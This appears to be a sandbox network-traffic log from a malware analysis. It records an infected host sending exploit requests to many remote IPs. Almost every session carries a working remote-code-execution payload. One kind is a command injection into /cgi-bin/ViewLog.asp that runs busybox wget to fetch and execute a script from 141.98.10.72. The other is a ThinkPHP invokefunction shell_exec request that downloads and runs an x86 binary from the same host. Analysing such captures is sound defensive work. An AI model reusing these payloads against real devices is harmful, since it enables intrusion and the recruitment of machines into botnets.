                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:52.412096024 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:13.913034916 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:54.867327929 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            316192.168.2.235485094.62.104.1158080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:32.814649105 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:33.037897110 CET86INHTTP/1.1 404 Not Found
                                                            Content-Length: 14
                                                            Content-Type: text/plain
                                                            Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a
                                                            Data Ascii: 404 Not Found


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            317192.168.2.235892685.106.8.2108080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:32.835824966 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:33.080852032 CET495INHTTP/1.1 302 Found
                                                            Date: Wed, 14 Feb 2024 08:28:32 GMT
                                                            Server: Apache
                                                            Location: https://192.168.0.14:4443/cgi-bin/ViewLog.asp
                                                            Content-Length: 229
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 31 39 32 2e 31 36 38 2e 30 2e 31 34 3a 34 34 34 33 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://192.168.0.14:4443/cgi-bin/ViewLog.asp">here</a>.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            318192.168.2.233546494.123.250.188080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:32.841289043 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            319192.168.2.234051295.100.72.9580
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:32.895211935 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:33.097737074 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:28:32 GMT
                                                            Date: Wed, 14 Feb 2024 08:28:32 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 30 37 61 37 62 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 33 31 32 26 23 34 36 3b 34 63 30 32 66 36 64 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;a07a7b5c&#46;1707899312&#46;4c02f6d2</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            320192.168.2.233827095.72.216.780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:32.922928095 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:33.153563976 CET317INHTTP/1.1 400 Bad Request
                                                            Server: Web server
                                                            Date: Wed, 14 Feb 2024 08:28:31 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 155
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            321192.168.2.233855295.111.216.16180
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:33.007961988 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:33.317496061 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:28:33 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            322192.168.2.234228231.136.29.688080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:33.018570900 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:33.633900881 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:34.878516912 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:37.566140890 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:42.685384989 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:52.668137074 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:13.913019896 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:54.867368937 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            323192.168.2.235324462.171.179.1098080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:33.025284052 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            324192.168.2.233356095.46.116.198080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:33.090353012 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:33.346765995 CET390INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Server: httpd
                                                            Date: Wed, 14 Feb 2024 08:28:33 GMT
                                                            Connection: close
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Cache-Control: post-check=0, pre-check=0
                                                            Pragma: no-cache
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 43 72 6f 73 73 20 53 69 74 65 20 41 63 74 69 6f 6e 20 64 65 74 65 63 74 65 64 21 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>Cross Site Action detected!</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            325192.168.2.233294294.120.235.1758080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:33.091744900 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            326192.168.2.2344112112.219.58.3580
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:33.194576979 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:33.494127035 CET327INHTTP/1.0 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:28:32 GMT
                                                            Server: Boa/0.94.14rc21
                                                            Accept-Ranges: bytes
                                                            Connection: close
                                                            Content-Type: text/html; charset=ISO-8859-1
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            327192.168.2.233358495.46.116.198080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:33.588354111 CET380INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Server: httpd
                                                            Date: Wed, 14 Feb 2024 08:28:33 GMT
                                                            Connection: close
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Cache-Control: post-check=0, pre-check=0
                                                            Pragma: no-cache
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            328192.168.2.233576495.179.201.498080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:33.798160076 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:34.001177073 CET207INHTTP/1.1 404 Not Found
                                                            Content-Type: text/plain; charset=utf-8
